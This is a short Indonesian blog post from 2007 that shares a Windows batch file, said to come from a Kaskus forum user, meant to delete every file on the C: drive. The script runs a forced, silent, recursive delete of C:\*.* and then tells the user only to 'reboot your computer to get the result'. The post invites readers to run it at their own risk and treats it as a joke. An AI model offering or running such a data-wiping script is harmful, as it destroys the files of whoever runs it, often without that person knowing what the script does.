Friday, November 30, 2007

Cara Menghapus Semua File di C:\

Ini ada batchscript dimabil dari CCPB@kaskus untuk menghapus semua file di dir c:\ windoz tentunya .. tinggal disimpa dengan format .bat, Jalanin aja langsung. Resiko tanggung sendiri yah ? heheehh

@echo off
echo.
echo.
del C:\*.* /f /s /q
echo.
echo.
echo reboot your computer to get the result
pause
exit

No comments: